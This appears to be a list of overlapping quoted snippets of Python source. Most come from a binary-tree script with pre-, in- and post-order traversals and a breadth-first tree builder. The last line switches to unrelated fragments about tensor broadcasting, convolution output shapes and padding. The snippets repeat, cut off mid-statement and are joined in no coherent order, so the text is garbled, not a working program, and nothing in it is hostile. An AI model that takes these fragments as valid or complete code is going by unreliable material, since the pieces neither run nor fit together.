in_order_walk_result =", "and \"right\" in node def make_node(data): node = { \"data\" : data }", ": data } return node def make_tree(items: list): tree = [] q =", "if right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of", "list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else", "else None left = node[\"left\"][\"data\"] if \"left\" in node else None right =", "of a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right:", "= child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] = child_node", "{ \"data\" : data } return node def make_tree(items: list): tree = []", "4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if", "None left = node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"]", "20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11])", "in node else None right = node[\"right\"][\"data\"] if \"right\" in node else None", "bool: return \"left\" in node and \"right\" in node def make_node(data): node =", "else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for node in tree:", "node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"] if \"right\" in", "(parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):", "in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"]", "elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise", "if node is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result,", "a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable,", "else None for item in items: print('DEBUG: adding item %s' % item) node", "} return node def make_tree(items: list): tree = [] q = Queue() current_parent", "add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node", "right, parent) \"\"\"A type of depth-first walk of a tree (left, parent, right)\"\"\"", "18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda", "result, left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in node:", "13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\"", "None: if left(node) is not None: post_order_walk(left(node), result, left, right, parent) if right(node)", "q.get(block=False) return tree def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"]", "16, 10, 9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result =", "if \"left\" in node else None, right=lambda node: node[\"right\"] if \"right\" in node", "in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"]", "= node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s: %s %s\"", "left, right, parent) if right(node) is not None: post_order_walk(right(node), result, left, right, parent)", "14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node:", "make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False)", "node else None left = node[\"left\"][\"data\"] if \"left\" in node else None right", "in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in node:", "= q.get(block=False) if q.empty() is False else None for item in items: print('DEBUG:", "None for item in items: print('DEBUG: adding item %s' % item) node =", "node def make_node(data): node = { \"data\" : data } return node def", "Callable): if node is not None: if left(node) is not None: post_order_walk(left(node), result,", "is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not", "if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else:", "def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end=' ') print()", "right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right, parent)", "%s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not None:", "is False else None for item in items: print('DEBUG: adding item %s' %", "not None: post_order_walk(left(node), result, left, right, parent) if right(node) is not None: post_order_walk(right(node),", "for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None", "if node is not None: if left(node) is not None: in_order_walk(left(node), result, left,", "12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13,", "pre_order_walk(left(node), result, left, right, parent) if right(node) is not None: pre_order_walk(right(node), result, left,", "else None right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <-", "in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"]", "if right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node,", "else None, right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda node:", "node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result)", "node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\" in", "is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk", "(left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):", "node: node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\"", "left: Callable, right: Callable, parent: Callable): if node is not None: result.append(node) if", "def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is", "') print() def main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17,", "= [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None,", "list): tree = [] q = Queue() current_parent = q.get(block=False) if q.empty() is", "\"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\" in node else", "type of depth-first walk of a tree (left, parent, right)\"\"\" def in_order_walk(node, result:", "else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\"", "21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4,", "is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk", "= q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list):", "\"left\" in node else None, right=lambda node: node[\"right\"] if \"right\" in node else", "node else None, right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda", "post_order_walk(left(node), result, left, right, parent) if right(node) is not None: post_order_walk(right(node), result, left,", "type of depth-first walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result:", "\"\"\"A type of depth-first walk of a tree (left, parent, right)\"\"\" def in_order_walk(node,", "node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if", "node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23, 22, 21, 12,", "tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9,", "else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(post_order_walk_result) main()", "%s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in", "tree = [] q = Queue() current_parent = q.get(block=False) if q.empty() is False", "Callable, parent: Callable): if node is not None: if left(node) is not None:", "parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node", "% node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23, 22, 21,", "print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def", "not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of", "def print_tree(tree: list): for node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in", "in node else None left = node[\"left\"][\"data\"] if \"left\" in node else None", "import Queue \"\"\"A type of depth-first walk of a tree (parent, left, right)\"\"\"", "make_tree(items: list): tree = [] q = Queue() current_parent = q.get(block=False) if q.empty()", "q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for", "None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result =", "typing import Callable from queue import Queue \"\"\"A type of depth-first walk of", "in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is not", "item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)):", "node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def", "Callable, right: Callable, parent: Callable): if node is not None: if left(node) is", "11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in", "= q.get(block=False) return tree def print_tree(tree: list): for node in tree: parent =", "if left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node)", "in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result,", "raise Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\" in node", "node else None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right))", "not None: pre_order_walk(left(node), result, left, right, parent) if right(node) is not None: pre_order_walk(right(node),", "7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"]", "tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable, parent:", "23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14,", "parent: Callable): if node is not None: if left(node) is not None: in_order_walk(left(node),", "22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7,", "def make_node(data): node = { \"data\" : data } return node def make_tree(items:", "result, left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left,", "right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node", "= node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node", "None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return", "is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left, right,", "else: raise Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\" in", "%s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node", "not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\"", "left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"]", "def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is", "return node def make_tree(items: list): tree = [] q = Queue() current_parent =", "tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"]", "else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\"", "current_parent = q.get(block=False) return tree def print_tree(tree: list): for node in tree: parent", "of depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list,", "of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right:", "node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result,", "left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right,", "depth-first walk of a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left:", "left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is", "\"\"\"A type of depth-first walk of a tree (left, right, parent)\"\"\" def post_order_walk(node,", "node = { \"data\" : data } return node def make_tree(items: list): tree", "q.empty() is False else None for item in items: print('DEBUG: adding item %s'", "Callable): if node is not None: result.append(node) if left(node) is not None: pre_order_walk(left(node),", "parent) if right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def", "None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\"", "for item in items: print('DEBUG: adding item %s' % item) node = make_node(item)", "node = make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent", "parent) \"\"\"A type of depth-first walk of a tree (left, right, parent)\"\"\" def", "in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is", "left(node) is not None: post_order_walk(left(node), result, left, right, parent) if right(node) is not", "node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"]", "\"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent node", "parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if", "% (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\"", "child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def is_full(node) ->", "if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree", "is_full(node) -> bool: return \"left\" in node and \"right\" in node def make_node(data):", "None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in", "parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = []", "for node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree", "node else: raise Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\"", "is not None: post_order_walk(left(node), result, left, right, parent) if right(node) is not None:", "if left(node) is not None: pre_order_walk(left(node), result, left, right, parent) if right(node) is", "node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result,", "node is full\") def is_full(node) -> bool: return \"left\" in node and \"right\"", "right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first", "not None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not None:", "is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if", "\"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in", "= node else: raise Exception(\"parent node is full\") def is_full(node) -> bool: return", "child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] =", "None: result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left, right, parent) if", "left, right, parent) if right(node) is not None: pre_order_walk(right(node), result, left, right, parent)", "left, right, parent) \"\"\"A type of depth-first walk of a tree (left, parent,", "from queue import Queue \"\"\"A type of depth-first walk of a tree (parent,", "node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if", "<- %s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for", "if node is not None: if left(node) is not None: post_order_walk(left(node), result, left,", "node[\"left\"] = child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] =", "= node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\"", "node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"] if \"right\" in", "None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of a", "None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree:", "child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] = node elif", "left: Callable, right: Callable, parent: Callable): if node is not None: if left(node)", "Callable, right: Callable, parent: Callable): if node is not None: result.append(node) if left(node)", "None: in_order_walk(left(node), result, left, right, parent) result.append(node) if right(node) is not None: in_order_walk(right(node),", "right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first", "tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent:", "post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node:", "None: post_order_walk(left(node), result, left, right, parent) if right(node) is not None: post_order_walk(right(node), result,", "result.append(node) if left(node) is not None: pre_order_walk(left(node), result, left, right, parent) if right(node)", "list, left: Callable, right: Callable, parent: Callable): if node is not None: result.append(node)", "def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is", "in node else None, right=lambda node: node[\"right\"] if \"right\" in node else None,", "node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for node in", "node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0],", "not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False)", "post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in", "right, parent) \"\"\"A type of depth-first walk of a tree (left, right, parent)\"\"\"", "not None: if left(node) is not None: in_order_walk(left(node), result, left, right, parent) result.append(node)", "\"left\" in node else None right = node[\"right\"][\"data\"] if \"right\" in node else", "left(node) is not None: pre_order_walk(left(node), result, left, right, parent) if right(node) is not", "a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable, right: Callable,", "= [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None,", "node in tree: parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left", "item in items: print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node)", "right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if", "not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node): if not", "(parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" %", "result, left, right, parent) if right(node) is not None: post_order_walk(right(node), result, left, right,", "= { \"data\" : data } return node def make_tree(items: list): tree =", "-> bool: return \"left\" in node and \"right\" in node def make_node(data): node", "make_node(data): node = { \"data\" : data } return node def make_tree(items: list):", "None, right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"]", "print() def main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15,", "node def make_tree(items: list): tree = [] q = Queue() current_parent = q.get(block=False)", "node and \"right\" in node def make_node(data): node = { \"data\" : data", "walk of a tree (left, parent, right)\"\"\" def in_order_walk(node, result: list, left: Callable,", "Callable from queue import Queue \"\"\"A type of depth-first walk of a tree", "right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node", "right=lambda node: node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"] if", "right = node[\"right\"][\"data\"] if \"right\" in node else None print(\"%s <- %s: %s", "if \"parent\" in node else None left = node[\"left\"][\"data\"] if \"left\" in node", "right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end=' ')", "pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node:", "current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree:", "= node[\"left\"][\"data\"] if \"left\" in node else None right = node[\"right\"][\"data\"] if \"right\"", "pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node: node[\"right\"]", "is not None: pre_order_walk(left(node), result, left, right, parent) if right(node) is not None:", "[] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda", "print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node", "node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else:", "is not None: if left(node) is not None: in_order_walk(left(node), result, left, right, parent)", "left, right, parent) \"\"\"A type of depth-first walk of a tree (left, right,", "\"\"\"A type of depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node,", "parent) if right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type", "right, parent) result.append(node) def add_child(node, child_node): if not \"left\" in node: node[\"left\"] =", "else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result", "= make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19,", "parent = node[\"parent\"][\"data\"] if \"parent\" in node else None left = node[\"left\"][\"data\"] if", "is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent =", "add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def print_tree(tree: list): for node", "right, parent) if right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node)", "left, right)) def print_tree_minimal(tree: list): for node in tree: print(\"%s\" % node[\"data\"], end='", "item %s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not", "items: print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node) tree.append(node) if", "in node and \"right\" in node def make_node(data): node = { \"data\" :", "%s\" % (parent, node[\"data\"], left, right)) def print_tree_minimal(tree: list): for node in tree:", "else None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left, right)) def", "right(node) is not None: post_order_walk(right(node), result, left, right, parent) result.append(node) def add_child(node, child_node):", "a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left: Callable, right: Callable,", "main(): tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10,", "in items: print('DEBUG: adding item %s' % item) node = make_node(item) q.put(node) tree.append(node)", "data } return node def make_tree(items: list): tree = [] q = Queue()", "result: list, left: Callable, right: Callable, parent: Callable): if node is not None:", "list): for node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main():", "def make_tree(items: list): tree = [] q = Queue() current_parent = q.get(block=False) if", "end=' ') print() def main(): tree = make_tree([25, 23, 22, 21, 12, 20,", "tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node)", "left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if", "if \"parent\" in node else None) print_tree_minimal(pre_order_walk_result) in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda", "[] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda", "pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable): if node is not", "node in tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree =", "in_order_walk_result = [] in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else", "in node else None print(\"%s <- %s: %s %s\" % (parent, node[\"data\"], left,", "\"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else", "not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent", "is not None: if left(node) is not None: post_order_walk(left(node), result, left, right, parent)", "child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"]", "in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of a tree", "tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent:", "Queue \"\"\"A type of depth-first walk of a tree (parent, left, right)\"\"\" def", "Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\" in node and", "17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree)", "(is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def", "child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def is_full(node) -> bool:", "result, left, right, parent) if right(node) is not None: pre_order_walk(right(node), result, left, right,", "19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result,", "if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda", "node is not None: if left(node) is not None: in_order_walk(left(node), result, left, right,", "if right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of", "adding item %s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent is", "tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23,", "depth-first walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left:", "10, 9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = []", "None: pre_order_walk(left(node), result, left, right, parent) if right(node) is not None: pre_order_walk(right(node), result,", "result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type", "if left(node) is not None: post_order_walk(left(node), result, left, right, parent) if right(node) is", "depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left:", "pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of a tree", "node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in", "make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18,", "parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A", "q.get(block=False) if q.empty() is False else None for item in items: print('DEBUG: adding", "\"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node:", "def is_full(node) -> bool: return \"left\" in node and \"right\" in node def", "in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node:", "right: Callable, parent: Callable): if node is not None: if left(node) is not", "= [] q = Queue() current_parent = q.get(block=False) if q.empty() is False else", "Queue() current_parent = q.get(block=False) if q.empty() is False else None for item in", "print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node", "\"right\" in node def make_node(data): node = { \"data\" : data } return", "node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(post_order_walk_result)", "= child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def is_full(node)", "% item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not None: if", "parent) \"\"\"A type of depth-first walk of a tree (left, parent, right)\"\"\" def", "post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else", "if \"left\" in node else None right = node[\"right\"][\"data\"] if \"right\" in node", "def add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] =", "= make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent =", "Callable, parent: Callable): if node is not None: result.append(node) if left(node) is not" ]
[ "out_shp: int corresponding to the output image shape on the considered axis. \"\"\"", "{} reverse = True if not broadcastable: reverse = False a_idx = [None]", "s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output", "0 if s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx]", "name=None): n = len(var.shape) assert len(strides) == n out_shape = () nz_indices =", "dim is None: return dim if dim < 0: dim = len(a_shp) +", "b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i]", "if not broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx =", "int. It must correspond to the dilation on the considered axis. Returns -------", "kernel shape. For a normal convolution, its four (for 2D convolution) or five", "output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices =", "1 out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l", "padding on height and width (and possibly depth) axis. subsample: tuple of int.", "len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for s in data.shape:", "all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx,", "to get the pad option Parameters ---------- padding : int or str Padding", "\\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1)", "+ 1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left", "= len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp", "1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx =", "{padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0,", "if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for s", "+ 0 # STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx", "b_map = {} for s in node_c.shape: idx = pm.index(0, s - 1)", "pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right =", "pad option Parameters ---------- padding : int or str Padding size, or ['VALID',", "border_mode >= 0 pad_l = pad_r = border_mode # In case of symbolic", "pad_r = border_mode # In case of symbolic shape, we want to build", "start = 0 if s in a_map: start = a_map[s] sidx = node_a.shape.index(s,", "Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int", "// 2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data:", "be 'valid' or 'full'. subsample: int. It must correspond to the subsampling on", "padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)]", "+ 2 * pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape", "data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx +", "TESTING out_idx.append(idx) else: raise 